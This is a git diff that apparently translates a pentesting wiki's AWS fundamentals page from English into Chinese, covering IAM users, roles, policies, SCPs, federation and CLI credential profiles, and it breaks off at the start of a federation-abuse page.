+绕过此限制的唯一方法是同时攻陷配置 SCP 的 **主账户**(主账户无法被阻止)。
> [!WARNING]
-> Note that **SCPs only restrict the principals in the account**, so other accounts are not affected. This means having an SCP deny `s3:GetObject` will not stop people from **accessing a public S3 bucket** in your account.
+> 请注意,**SCP 仅限制账户中的主体**,因此其他账户不受影响。这意味着拥有一个 SCP 拒绝 `s3:GetObject` 不会阻止人们 **访问您账户中的公共 S3 存储桶**。
-SCP examples:
+SCP 示例:
-- Deny the root account entirely
-- Only allow specific regions
-- Only allow white-listed services
-- Deny GuardDuty, CloudTrail, and S3 Public Block Access from
+- 完全拒绝根账户
+- 仅允许特定区域
+- 仅允许白名单服务
+- 拒绝禁用 GuardDuty、CloudTrail 和 S3 公共阻止访问
- being disabled
+- 拒绝删除或修改安全/事件响应角色。
-- Deny security/incident response roles from being deleted or
+- 拒绝删除备份。
+- 拒绝创建 IAM 用户和访问密钥
- modified.
-
-- Deny backups from being deleted.
-- Deny creating IAM users and access keys
-
-Find **JSON examples** in [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html)
+在 [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html) 中查找 **JSON 示例**。
### ARN
-**Amazon Resource Name** is the **unique name** every resource inside AWS has, its composed like this:
-
+**亚马逊资源名称** 是每个 AWS 内部资源的 **唯一名称**,其组成如下:
```
arn:partition:service:region:account-id:resource-type/resource-id
arn:aws:elasticbeanstalk:us-west-1:123456789098:environment/App/Env
```
-
-Note that there are 4 partitions in AWS but only 3 ways to call them:
+注意,AWS中有4个分区,但只有3种调用方式:
- AWS Standard: `aws`
- AWS China: `aws-cn`
- AWS US public Internet (GovCloud): `aws-us-gov`
- AWS Secret (US Classified): `aws`
-## IAM - Identity and Access Management
+## IAM - 身份和访问管理
-IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account.
+IAM是允许您管理**身份验证**、**授权**和**访问控制**的服务。
-- **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification.
-- **Authorization** - Determines what an identity can access within a system once it's been authenticated to it.
-- **Access Control** - The method and process of how access is granted to a secure resource
+- **身份验证** - 定义身份和验证该身份的过程。此过程可以细分为:识别和验证。
+- **授权** - 确定身份在系统中经过身份验证后可以访问的内容。
+- **访问控制** - 授予安全资源访问权限的方法和过程。
-IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account.
+IAM可以通过其管理、控制和治理身份对您AWS账户内资源的身份验证、授权和访问控制机制的能力来定义。
-### [AWS account root user](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html)
+### [AWS账户根用户](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html)
-When you first create an Amazon Web Services (AWS) account, you begin with a single sign-in identity that has **complete access to all** AWS services and resources in the account. This is the AWS account _**root user**_ and is accessed by signing in with the **email address and password that you used to create the account**.
+当您首次创建Amazon Web Services (AWS)账户时,您将拥有一个具有**完全访问所有**AWS服务和资源的单一登录身份。这是AWS账户的_**根用户**_,通过使用**您用于创建账户的电子邮件地址和密码**进行登录。
-Note that a new **admin user** will have **less permissions that the root user**.
+请注意,新创建的**管理员用户**将具有**比根用户更少的权限**。
-From a security point of view, it's recommended to create other users and avoid using this one.
+从安全的角度来看,建议创建其他用户并避免使用此用户。
-### [IAM users](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html)
+### [IAM用户](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html)
-An IAM _user_ is an entity that you create in AWS to **represent the person or application** that uses it to **interact with AWS**. A user in AWS consists of a name and credentials (password and up to two access keys).
+IAM_用户_是您在AWS中创建的实体,用于**代表使用它与AWS交互的人员或应用程序**。AWS中的用户由名称和凭据(密码和最多两个访问密钥)组成。
-When you create an IAM user, you grant it **permissions** by making it a **member of a user group** that has appropriate permission policies attached (recommended), or by **directly attaching policies** to the user.
+当您创建IAM用户时,您通过将其设置为具有适当权限策略的**用户组成员**(推荐)或**直接将策略附加**到用户来授予其**权限**。
-Users can have **MFA enabled to login** through the console. API tokens of MFA enabled users aren't protected by MFA. If you want to **restrict the access of a users API keys using MFA** you need to indicate in the policy that in order to perform certain actions MFA needs to be present (example [**here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html)).
+用户可以启用**MFA登录**控制台。启用MFA的用户的API令牌不受MFA保护。如果您想要**使用MFA限制用户的API密钥访问**,您需要在策略中指明为了执行某些操作需要MFA(示例[**在这里**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html))。
#### CLI
-- **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT
-- **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs).
+- **访问密钥ID**:20个随机的大写字母数字字符,如AKHDNAPO86BSHKDIRYT
+- **秘密访问密钥ID**:40个随机的大小写字符:S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU(无法检索丢失的秘密访问密钥ID)。
-Whenever you need to **change the Access Key** this is the process you should follow:\
+每当您需要**更改访问密钥**时,您应遵循以下过程:\
&#xNAN;_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_
-### MFA - Multi Factor Authentication
+### MFA - 多因素身份验证
-It's used to **create an additional factor for authentication** in addition to your existing methods, such as password, therefore, creating a multi-factor level of authentication.\
-You can use a **free virtual application or a physical device**. You can use apps like google authentication for free to activate a MFA in AWS.
+它用于**创建额外的身份验证因素**,以补充您现有的方法,例如密码,从而创建多因素身份验证级别。\
+您可以使用**免费的虚拟应用程序或物理设备**。您可以使用像Google身份验证器这样的应用程序免费激活AWS中的MFA。
-Policies with MFA conditions can be attached to the following:
+带有MFA条件的策略可以附加到以下内容:
-- An IAM user or group
-- A resource such as an Amazon S3 bucket, Amazon SQS queue, or Amazon SNS topic
-- The trust policy of an IAM role that can be assumed by a user
-
-If you want to **access via CLI** a resource that **checks for MFA** you need to call **`GetSessionToken`**. That will give you a token with info about MFA.\
-Note that **`AssumeRole` credentials don't contain this information**.
+- IAM用户或组
+- 资源,例如Amazon S3桶、Amazon SQS队列或Amazon SNS主题
+- 可以被用户假设的IAM角色的信任策略
+如果您想要**通过CLI访问**一个**检查MFA**的资源,您需要调用**`GetSessionToken`**。这将为您提供一个包含MFA信息的令牌。\
+请注意,**`AssumeRole`凭据不包含此信息**。
```bash
aws sts get-session-token --serial-number --token-code
```
+如[**此处所述**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html),有很多不同的情况**无法使用MFA**。
-As [**stated here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html), there are a lot of different cases where **MFA cannot be used**.
+### [IAM用户组](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html)
-### [IAM user groups](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html)
+IAM [用户组](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) 是一种**一次性将策略附加到多个用户**的方法,这可以使管理这些用户的权限变得更容易。**角色和组不能成为组的一部分**。
-An IAM [user group](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) is a way to **attach policies to multiple users** at one time, which can make it easier to manage the permissions for those users. **Roles and groups cannot be part of a group**.
+您可以将**基于身份的策略附加到用户组**,以便用户组中的所有**用户**都**接收该策略的权限**。您**不能**在**策略**(例如基于资源的策略)中将**用户组**标识为**`Principal`**,因为组与权限相关,而不是身份验证,主体是经过身份验证的IAM实体。
-You can attach an **identity-based policy to a user group** so that all of the **users** in the user group **receive the policy's permissions**. You **cannot** identify a **user group** as a **`Principal`** in a **policy** (such as a resource-based policy) because groups relate to permissions, not authentication, and principals are authenticated IAM entities.
+以下是用户组的一些重要特征:
-Here are some important characteristics of user groups:
+- 一个用户**组**可以**包含多个用户**,而一个**用户**可以**属于多个组**。
+- **用户组不能嵌套**;它们只能包含用户,而不能包含其他用户组。
+- **没有默认的用户组会自动包含AWS账户中的所有用户**。如果您想要这样的用户组,您必须创建它并将每个新用户分配给它。
+- AWS账户中IAM资源的数量和大小是有限制的,例如组的数量,以及用户可以成为成员的组的数量。有关更多信息,请参见[IAM和AWS STS配额](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html)。
-- A user **group** can **contain many users**, and a **user** can **belong to multiple groups**.
-- **User groups can't be nested**; they can contain only users, not other user groups.
-- There is **no default user group that automatically includes all users in the AWS account**. If you want to have a user group like that, you must create it and assign each new user to it.
-- The number and size of IAM resources in an AWS account, such as the number of groups, and the number of groups that a user can be a member of, are limited. For more information, see [IAM and AWS STS quotas](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html).
+### [IAM角色](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html)
-### [IAM roles](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html)
+IAM **角色**与**用户**非常**相似**,因为它是一个**具有权限策略的身份,决定了它在AWS中可以做什么和不能做什么**。然而,角色**没有任何凭证**(密码或访问密钥)与之关联。角色不是唯一与一个人关联,而是旨在**被任何需要它的人(并且有足够权限)假设**。IAM用户可以假设一个角色以**临时**承担特定任务的不同权限。角色可以被[**联合用户**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html)分配,该用户通过使用外部身份提供者而不是IAM进行登录。
-An IAM **role** is very **similar** to a **user**, in that it is an **identity with permission policies that determine what** it can and cannot do in AWS. However, a role **does not have any credentials** (password or access keys) associated with it. Instead of being uniquely associated with one person, a role is intended to be **assumable by anyone who needs it (and have enough perms)**. An **IAM user can assume a role to temporarily** take on different permissions for a specific task. A role can be **assigned to a** [**federated user**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html) who signs in by using an external identity provider instead of IAM.
+IAM角色由**两种类型的策略**组成:**信任策略**,不能为空,定义**谁可以假设**该角色,以及**权限策略**,不能为空,定义**它可以访问什么**。
-An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining **who can assume** the role, and a **permissions policy**, which cannot be empty, defining **what it can access**.
+#### AWS安全令牌服务(STS)
-#### AWS Security Token Service (STS)
+AWS安全令牌服务(STS)是一个网络服务,促进**临时、有限权限凭证的发放**。它专门针对:
-AWS Security Token Service (STS) is a web service that facilitates the **issuance of temporary, limited-privilege credentials**. It is specifically tailored for:
+### [IAM中的临时凭证](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html)
-### [Temporary credentials in IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html)
+**临时凭证主要与IAM角色一起使用**,但也有其他用途。您可以请求具有比标准IAM用户更有限权限集的临时凭证。这**防止**您**意外执行不允许的任务**。临时凭证的一个好处是它们在设定的时间段后会自动过期。您可以控制凭证的有效期。
-**Temporary credentials are primarily used with IAM roles**, but there are also other uses. You can request temporary credentials that have a more restricted set of permissions than your standard IAM user. This **prevents** you from **accidentally performing tasks that are not permitted** by the more restricted credentials. A benefit of temporary credentials is that they expire automatically after a set period of time. You have control over the duration that the credentials are valid.
+### 策略
-### Policies
+#### 策略权限
-#### Policy Permissions
+用于分配权限。有两种类型:
-Are used to assign permissions. There are 2 types:
-
-- AWS managed policies (preconfigured by AWS)
-- Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI view that helps you granting and denying permissions) or writing your own..
-
-By **default access** is **denied**, access will be granted if an explicit role has been specified.\
-If **single "Deny" exist, it will override the "Allow"**, except for requests that use the AWS account's root security credentials (which are allowed by default).
+- AWS管理策略(由AWS预配置)
+- 客户管理策略:由您配置。您可以基于AWS管理策略创建策略(修改其中一个并创建自己的),使用策略生成器(一个帮助您授予和拒绝权限的GUI视图)或编写自己的策略。
+默认情况下,访问**被拒绝**,如果指定了明确的角色,则将授予访问权限。\
+如果**存在单个“拒绝”**,它将覆盖“允许”,但AWS账户的根安全凭证的请求(默认允许)除外。
```javascript
{
- "Version": "2012-10-17", //Version of the policy
- "Statement": [ //Main element, there can be more than 1 entry in this array
- {
- "Sid": "Stmt32894y234276923" //Unique identifier (optional)
- "Effect": "Allow", //Allow or deny
- "Action": [ //Actions that will be allowed or denied
- "ec2:AttachVolume",
- "ec2:DetachVolume"
- ],
- "Resource": [ //Resource the action and effect will be applied to
- "arn:aws:ec2:*:*:volume/*",
- "arn:aws:ec2:*:*:instance/*"
- ],
- "Condition": { //Optional element that allow to control when the permission will be effective
- "ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
- }
- }
- ]
+"Version": "2012-10-17", //Version of the policy
+"Statement": [ //Main element, there can be more than 1 entry in this array
+{
+"Sid": "Stmt32894y234276923" //Unique identifier (optional)
+"Effect": "Allow", //Allow or deny
+"Action": [ //Actions that will be allowed or denied
+"ec2:AttachVolume",
+"ec2:DetachVolume"
+],
+"Resource": [ //Resource the action and effect will be applied to
+"arn:aws:ec2:*:*:volume/*",
+"arn:aws:ec2:*:*:instance/*"
+],
+"Condition": { //Optional element that allow to control when the permission will be effective
+"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
+}
+}
+]
}
```
+The [全球字段可以在任何服务中用于条件的文档在这里](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount).\
+The [每个服务中可以用于条件的特定字段的文档在这里](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html).
-The [global fields that can be used for conditions in any service are documented here](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount).\
-The [specific fields that can be used for conditions per service are documented here](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html).
+#### 内联策略
-#### Inline Policies
+这种策略是**直接分配**给用户、组或角色的。因此,它们不会出现在策略列表中,因为其他任何人都可以使用它们。\
+内联策略在您想要**保持策略与应用于的身份之间的严格一对一关系**时非常有用。例如,您想确保策略中的权限不会意外分配给除其预期身份以外的身份。当您使用内联策略时,策略中的权限不能意外附加到错误的身份。此外,当您使用AWS管理控制台删除该身份时,嵌入在身份中的策略也会被删除。这是因为它们是主体实体的一部分。
-This kind of policies are **directly assigned** to a user, group or role. Then, they do not appear in the Policies list as any other one can use them.\
-Inline policies are useful if you want to **maintain a strict one-to-one relationship between a policy and the identity** that it's applied to. For example, you want to be sure that the permissions in a policy are not inadvertently assigned to an identity other than the one they're intended for. When you use an inline policy, the permissions in the policy cannot be inadvertently attached to the wrong identity. In addition, when you use the AWS Management Console to delete that identity, the policies embedded in the identity are deleted as well. That's because they are part of the principal entity.
+#### 资源桶策略
-#### Resource Bucket Policies
+这些是可以在**资源**中定义的**策略**。**并非所有AWS资源都支持它们**。
-These are **policies** that can be defined in **resources**. **Not all resources of AWS supports them**.
+如果主体没有对它们的明确拒绝,并且资源策略授予他们访问权限,则他们被允许。
-If a principal does not have an explicit deny on them, and a resource policy grants them access, then they are allowed.
+### IAM边界
-### IAM Boundaries
+IAM边界可以用于**限制用户或角色应有的权限**。这样,即使通过**不同的策略**授予用户不同的权限,如果他尝试使用它们,操作将**失败**。
-IAM boundaries can be used to **limit the permissions a user or role should have access to**. This way, even if a different set of permissions are granted to the user by a **different policy** the operation will **fail** if he tries to use them.
+边界只是附加到用户的策略,**指示用户或角色可以拥有的最大权限级别**。因此,**即使用户具有管理员访问权限**,如果边界指示他只能读取S·桶,那就是他能做的最大事情。
-A boundary is just a policy attached to a user which **indicates the maximum level of permissions the user or role can have**. So, **even if the user has Administrator access**, if the boundary indicates he can only read S· buckets, that's the maximum he can do.
+**这**、**SCPs**和**遵循最小权限**原则是控制用户没有超过其所需权限的方法。
-**This**, **SCPs** and **following the least privilege** principle are the ways to control that users doesn't have more permissions than the ones he needs.
+### 会话策略
-### Session Policies
-
-A session policy is a **policy set when a role is assumed** somehow. This will be like an **IAM boundary for that session**: This means that the session policy doesn't grant permissions but **restrict them to the ones indicated in the policy** (being the max permissions the ones the role has).
-
-This is useful for **security meassures**: When an admin is going to assume a very privileged role he could restrict the permission to only the ones indicated in the session policy in case the session gets compromised.
+会话策略是**在某种情况下假定角色时设置的策略**。这将像是该会话的**IAM边界**:这意味着会话策略不授予权限,而是**将权限限制为策略中指示的权限**(最大权限是角色拥有的权限)。
+这对于**安全措施**非常有用:当管理员要假定一个非常特权的角色时,他可以将权限限制为仅在会话策略中指示的权限,以防会话被破坏。
```bash
aws sts assume-role \
- --role-arn \
- --role-session-name \
- [--policy-arns ]
- [--policy ]
+--role-arn \
+--role-session-name \
+[--policy-arns ]
+[--policy ]
```
+注意,默认情况下,**AWS 可能会向即将生成的会话添加会话策略**,这是由于第三方原因。例如,在[未经身份验证的 Cognito 假定角色](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles)中,默认情况下(使用增强身份验证),AWS 将生成**带有会话策略的会话凭证**,该策略限制会话可以访问的服务[**为以下列表**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services)。
-Note that by default **AWS might add session policies to sessions** that are going to be generated because of third reasons. For example, in [unauthenticated cognito assumed roles](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles) by default (using enhanced authentication), AWS will generate **session credentials with a session policy** that limits the services that session can access [**to the following list**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services).
+因此,如果在某个时刻你遇到错误“...因为没有会话策略允许...”,而角色有权限执行该操作,那是因为**有一个会话策略阻止了它**。
-Therefore, if at some point you face the error "... because no session policy allows the ...", and the role has access to perform the action, it's because **there is a session policy preventing it**.
+### 身份联合
-### Identity Federation
+身份联合**允许来自外部身份提供者的用户**安全地访问 AWS 资源,而无需提供有效 IAM 用户帐户的 AWS 用户凭证。\
+身份提供者的一个例子可以是你自己的企业**Microsoft Active Directory**(通过**SAML**)或**OpenID**服务(如**Google**)。联合访问将允许其中的用户访问 AWS。
-Identity federation **allows users from identity providers which are external** to AWS to access AWS resources securely without having to supply AWS user credentials from a valid IAM user account.\
-An example of an identity provider can be your own corporate **Microsoft Active Directory** (via **SAML**) or **OpenID** services (like **Google**). Federated access will then allow the users within it to access AWS.
+要配置此信任,生成一个**IAM 身份提供者(SAML 或 OAuth)**,该提供者将**信任****其他平台**。然后,至少一个**IAM 角色被分配(信任)给身份提供者**。如果来自受信任平台的用户访问 AWS,他将以提到的角色进行访问。
-To configure this trust, an **IAM Identity Provider is generated (SAML or OAuth)** that will **trust** the **other platform**. Then, at least one **IAM role is assigned (trusting) to the Identity Provider**. If a user from the trusted platform access AWS, he will be accessing as the mentioned role.
-
-However, you will usually want to give a **different role depending on the group of the user** in the third party platform. Then, several **IAM roles can trust** the third party Identity Provider and the third party platform will be the one allowing users to assume one role or the other.
+然而,通常你会希望根据第三方平台中用户的**组别给予不同的角色**。然后,多个**IAM 角色可以信任**第三方身份提供者,第三方平台将允许用户假定一个角色或另一个角色。
-### IAM Identity Center
+### IAM 身份中心
-AWS IAM Identity Center (successor to AWS Single Sign-On) expands the capabilities of AWS Identity and Access Management (IAM) to provide a **central plac**e that brings together **administration of users and their access to AWS** accounts and cloud applications.
+AWS IAM 身份中心(AWS 单点登录的继任者)扩展了 AWS 身份和访问管理(IAM)的功能,提供一个**集中位置**,将**用户及其对 AWS**帐户和云应用程序的访问管理汇集在一起。
-The login domain is going to be something like `.awsapps.com`.
+登录域将类似于`.awsapps.com`。
-To login users, there are 3 identity sources that can be used:
+要登录用户,可以使用 3 个身份源:
-- Identity Center Directory: Regular AWS users
-- Active Directory: Supports different connectors
-- External Identity Provider: All users and groups come from an external Identity Provider (IdP)
+- 身份中心目录:常规 AWS 用户
+- Active Directory:支持不同的连接器
+- 外部身份提供者:所有用户和组来自外部身份提供者(IdP)
-In the simplest case of Identity Center directory, the **Identity Center will have a list of users & groups** and will be able to **assign policies** to them to **any of the accounts** of the organization.
+在身份中心目录的最简单情况下,**身份中心将拥有用户和组的列表**,并能够**为他们分配策略**到**组织的任何帐户**。
-In order to give access to a Identity Center user/group to an account a **SAML Identity Provider trusting the Identity Center will be created**, and a **role trusting the Identity Provider with the indicated policies will be created** in the destination account.
+为了给予身份中心用户/组对帐户的访问,将创建一个**信任身份中心的 SAML 身份提供者**,并在目标帐户中创建一个**信任身份提供者并具有指示策略的角色**。
#### AwsSSOInlinePolicy
-It's possible to **give permissions via inline policies to roles created via IAM Identity Center**. The roles created in the accounts being given **inline policies in AWS Identity Center** will have these permissions in an inline policy called **`AwsSSOInlinePolicy`**.
+可以通过内联策略**向通过 IAM 身份中心创建的角色授予权限**。在被授予**AWS 身份中心内联策略**的帐户中创建的角色将具有名为**`AwsSSOInlinePolicy`**的内联策略中的这些权限。
-Therefore, even if you see 2 roles with an inline policy called **`AwsSSOInlinePolicy`**, it **doesn't mean it has the same permissions**.
+因此,即使你看到两个具有名为**`AwsSSOInlinePolicy`**的内联策略的角色,也**并不意味着它们具有相同的权限**。
-### Cross Account Trusts and Roles
+### 跨账户信任和角色
-**A user** (trusting) can create a Cross Account Role with some policies and then, **allow another user** (trusted) to **access his account** but only **having the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offers two options. Providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account.\
-It's recommended to **specify the user who is trusted and not put some generic thing** because if not, other authenticated users like federated users will be able to also abuse this trust.
+**用户**(信任)可以创建一个带有某些策略的跨账户角色,然后**允许另一个用户**(受信任)**访问他的帐户**,但仅**具有新角色策略中指示的访问权限**。要创建此角色,只需创建一个新角色并选择跨账户角色。跨账户访问的角色提供两个选项。提供你拥有的 AWS 账户之间的访问,以及提供你拥有的账户与第三方 AWS 账户之间的访问。\
+建议**指定被信任的用户,而不是放置一些通用内容**,因为如果不这样做,其他经过身份验证的用户(如联合用户)也将能够滥用此信任。
-### AWS Simple AD
+### AWS 简单 AD
-Not supported:
+不支持:
-- Trust Relations
-- AD Admin Center
-- Full PS API support
-- AD Recycle Bin
-- Group Managed Service Accounts
-- Schema Extensions
-- No Direct access to OS or Instances
+- 信任关系
+- AD 管理中心
+- 完整的 PS API 支持
+- AD 回收站
+- 组托管服务账户
+- 架构扩展
+- 无法直接访问操作系统或实例
-#### Web Federation or OpenID Authentication
+#### Web 联合或 OpenID 身份验证
-The app uses the AssumeRoleWithWebIdentity to create temporary credentials. However, this doesn't grant access to the AWS console, just access to resources within AWS.
+该应用程序使用 AssumeRoleWithWebIdentity 创建临时凭证。然而,这并不授予对 AWS 控制台的访问,仅授予对 AWS 内部资源的访问。
-### Other IAM options
+### 其他 IAM 选项
-- You can **set a password policy setting** options like minimum length and password requirements.
-- You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**.
+- 你可以**设置密码策略设置**选项,如最小长度和密码要求。
+- 你可以**下载“凭证报告”**,其中包含有关当前凭证的信息(如用户创建时间、密码是否启用...)。你可以每**四小时**生成一次凭证报告。
-AWS Identity and Access Management (IAM) provides **fine-grained access control** across all of AWS. With IAM, you can specify **who can access which services and resources**, and under which conditions. With IAM policies, you manage permissions to your workforce and systems to **ensure least-privilege permissions**.
+AWS 身份和访问管理(IAM)提供**细粒度的访问控制**,覆盖所有 AWS。使用 IAM,你可以指定**谁可以访问哪些服务和资源**,以及在什么条件下。通过 IAM 策略,你管理对你的员工和系统的权限,以**确保最小权限**。
-### IAM ID Prefixes
+### IAM ID 前缀
-In [**this page**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids) you can find the **IAM ID prefixe**d of keys depending on their nature:
+在[**此页面**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids)中,你可以找到根据其性质的键的**IAM ID 前缀**:
-| ABIA | [AWS STS service bearer token](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html) |
+| ABIA | [AWS STS 服务承载令牌](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html) |
| ---- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| ACCA | Context-specific credential |
-| AGPA | User group |
-| AIDA | IAM user |
-| AIPA | Amazon EC2 instance profile |
-| AKIA | Access key |
-| ANPA | Managed policy |
-| ANVA | Version in a managed policy |
-| APKA | Public key |
-| AROA | Role |
-| ASCA | Certificate |
-| ASIA | [Temporary (AWS STS) access key IDs](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) use this prefix, but are unique only in combination with the secret access key and the session token. |
+| ACCA | 上下文特定凭证 |
+| AGPA | 用户组 |
+| AIDA | IAM 用户 |
+| AIPA | Amazon EC2 实例配置文件 |
+| AKIA | 访问密钥 |
+| ANPA | 管理策略 |
+| ANVA | 管理策略中的版本 |
+| APKA | 公钥 |
+| AROA | 角色 |
+| ASCA | 证书 |
+| ASIA | [临时(AWS STS)访问密钥 ID](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) 使用此前缀,但仅在与秘密访问密钥和会话令牌组合时是唯一的。 |
-### Recommended permissions to audit accounts
+### 审计账户的推荐权限
-The following privileges grant various read access of metadata:
+以下权限授予各种元数据的读取访问:
- `arn:aws:iam::aws:policy/SecurityAudit`
- `arn:aws:iam::aws:policy/job-function/ViewOnlyAccess`
@@ -336,14 +320,13 @@ The following privileges grant various read access of metadata:
- `directconnect:DescribeConnections`
- `dynamodb:ListTables`
-## Misc
+## 杂项
-### CLI Authentication
-
-In order for a regular user authenticate to AWS via CLI you need to have **local credentials**. By default you can configure them **manually** in `~/.aws/credentials` or by **running** `aws configure`.\
-In that file you can have more than one profile, if **no profile** is specified using the **aws cli**, the one called **`[default]`** in that file will be used.\
-Example of credentials file with more than 1 profile:
+### CLI 身份验证
+为了让常规用户通过 CLI 认证到 AWS,你需要拥有**本地凭证**。默认情况下,你可以在`~/.aws/credentials`中**手动**配置它们,或通过**运行**`aws configure`。\
+在该文件中,你可以拥有多个配置文件,如果在使用**aws cli**时**未指定配置文件**,则将使用该文件中名为**`[default]`**的配置文件。\
+具有多个配置文件的凭证文件示例:
```
[default]
aws_access_key_id = AKIA5ZDCUJHF83HDTYUT
@@ -354,12 +337,10 @@ aws_access_key_id = AKIA8YDCu7TGTR356SHYT
aws_secret_access_key = uOcdhof683fbOUGFYEQuR2EIHG34UY987g6ff7
region = eu-west-2
```
+如果您需要访问**不同的AWS账户**,并且您的配置文件被授予访问**在这些账户内假设角色**的权限,您不需要每次手动调用STS(`aws sts assume-role --role-arn --role-session-name sessname`)并配置凭证。
-If you need to access **different AWS accounts** and your profile was given access to **assume a role inside those accounts**, you don't need to call manually STS every time (`aws sts assume-role --role-arn --role-session-name sessname`) and configure the credentials.
-
-You can use the `~/.aws/config` file to[ **indicate which roles to assume**](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html), and then use the `--profile` param as usual (the `assume-role` will be performed in a transparent way for the user).\
-A config file example:
-
+您可以使用`~/.aws/config`文件来[**指示要假设的角色**](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html),然后像往常一样使用`--profile`参数(`assume-role`将以透明的方式为用户执行)。\
+配置文件示例:
```
[profile acc2]
region=eu-west-2
@@ -368,23 +349,16 @@ role_session_name =
source_profile =
sts_regional_endpoints = regional
```
-
-With this config file you can then use aws cli like:
-
+使用此配置文件,您可以像这样使用 aws cli:
```
aws --profile acc2 ...
```
+如果您正在寻找类似的东西,但针对**浏览器**,您可以查看**扩展** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en)。
-If you are looking for something **similar** to this but for the **browser** you can check the **extension** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en).
-
-## References
+## 参考文献
- [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html)
- [https://aws.amazon.com/iam/](https://aws.amazon.com/iam/)
- [https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html](https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html)
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md b/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
index 73ae6b448..ee9ea8ce7 100644
--- a/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
+++ b/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
@@ -1,87 +1,84 @@
-# AWS - Federation Abuse
+# AWS - 联邦滥用
{{#include ../../../banners/hacktricks-training.md}}
## SAML
-For info about SAML please check:
+有关 SAML 的信息,请查看:
{{#ref}}
https://book.hacktricks.xyz/pentesting-web/saml-attacks
{{#endref}}
-In order to configure an **Identity Federation through SAML** you just need to provide a **name** and the **metadata XML** containing all the SAML configuration (**endpoints**, **certificate** with public key)
